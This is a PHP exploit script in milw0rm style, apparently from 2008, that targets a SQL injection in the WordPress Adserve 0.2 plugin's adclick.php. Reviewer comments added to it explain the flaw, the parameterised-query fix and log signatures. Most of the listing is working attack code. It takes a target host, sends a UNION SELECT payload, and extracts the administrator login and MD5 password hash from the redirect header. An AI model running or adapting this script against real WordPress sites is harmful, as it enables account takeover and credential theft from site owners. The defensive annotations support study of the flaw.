Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit

  1    <?
       # NOTE(review): this listing is a document rendering, not the original file.
       # Hyphens appear as U+2212 and single quotes as curly quotes throughout, so the
       # text is not byte-exact PHP; read it for the pattern, not as runnable code.
  2    # WordPress Adserve plugin v 0.2 Sql Injection Exploit
  3    #
  4    # Plugin Homepage−http://www.irisco.it/?page_id=40
  5    #
  6    # Found by:enter_the_dragon
  7    #
  8
  9    #   Vuln code
  10   #
  11   #   −In adclick.php
  12   #
  13   #   if (isset($_GET[’id’])) {
  14   #      Header("Location: ".iri_AdServe_BannerClick($_GET[’id’])
  15   #
  16   #   −In   iri_AdServe_BannerClick function
  17   #
  18   #          return $wpdb−>get_var("SELECT url FROM $table_name WHERE id=$id;");
  19   #
       # Review (defender): the root cause is visible on the two quoted lines above.
       # $_GET['id'] is passed straight through and interpolated into the SQL string,
       # and the query result is then placed unchecked into a Location header. The
       # fix on the plugin side is to parameterise the query
       # ($wpdb->get_var($wpdb->prepare("SELECT url FROM $table_name WHERE id = %d", $id)))
       # after casting the request value to int, and to redirect only to a value that
       # has been validated as a URL rather than to raw database output.
  20   #
  21   #
  22
  23   # Exploit
  24   #
  25   # id variable isnt filtered so we can inject and check the output in the Location response−header
  26   # If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
  27   #
  28   #
  29
  30
  31
  32
       # CLI banner; the script expects exactly two positional arguments (host and
       # WordPress path) and exits with usage text otherwise.
  33   echo "\n";
  34   echo "−−−−−−−WordPress Adserve plugin v 0.2 Sql Injection Exploit−−−−−−−"."\n";
  35   echo "−−−−−−−−−−−−−−−−−−−coded by : enter_the_dragon−−−−−−−−−−−−−−−−−−−−"."\n";
  36   echo "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−"."\n";
  37   if ($argc!=3)
  38   {
  39   echo " Usage:       $argv[0] target_host wp_path \n";
  40   echo " target_host:             Your target ex www.target.com \n";
  41   echo " wp_path:     WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";
  42   echo "\n";
  43   exit;
  44   }
  45
  46
       # The request URL is host + path + the plugin endpoint with a fixed id value.
       # Detection note: a legitimate id for this endpoint is numeric, so any request
       # to adclick.php whose id parameter is non-numeric or contains SQL keywords
       # (union/select/concat) is a clear log or WAF signature for this issue.
  47   $query=$argv[1];
  48   $query.=$argv[2];
  49   $query.="wp−content/plugins/wp−adserve/adclick.php?";
  50   $query.="id=−1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";
  51
  52

       # Single GET via libcurl; response headers are kept (CURLOPT_HEADER) because the
       # leaked data, if any, is expected in the Location header rather than the body.
       # The exploit is only attempted when curl is available (else branch at the end).
  53   if(function_exists(curl_init))
  54   {
  55     $ch = curl_init("http://$query");
  56     curl_setopt($ch, CURLOPT_HEADER,true);
  57     curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
  58     curl_setopt($ch, CURLOPT_TIMEOUT,10);
  59     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
  60     $html=curl_exec($ch);
  61     $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
  62     curl_close($ch);
  63
       # Defender note: the observable symptom is a 302 whose Location header carries
       # pipe-delimited query output instead of a URL. On the server side the same
       # condition should never arise if id is cast to int and the redirect target is
       # validated; in logs it shows up as the non-numeric id request above answered
       # with 302.
  64        if($returncode==302)
  65           {
       # Matches |<login>|<32-char hash>| — the shape produced by the concat() in the
       # payload. As rendered here the character class contains U+2212 rather than a
       # hyphen, so this transcription is not the range the author intended.
  66               $pattern="/\|(.*)?\|([a−z0−9]{32})\|/";
  67               if(preg_match($pattern,$html,$matches))
  68                 {
  69                   $adminusername=$matches[1];
  70                   $adminpass=$matches[2];
  71                   echo "Admin Login:$adminusername\n" ;
  72                   echo "Admin Pass :$adminpass\n";
  73                 }
  74           }
  75               else
  76           {
  77               exit ("Exploit Failed :( \n");
  78           }
  79
  80
  81   }
  82   else
  83   exit("Error:Libcurl isnt installed \n");
  84
       # Anything after the closing tag below (the milw0rm footer) is emitted as
       # literal output, not treated as a PHP comment.
  85   ?>
  86
  87   # milw0rm.com [2008−01−30]



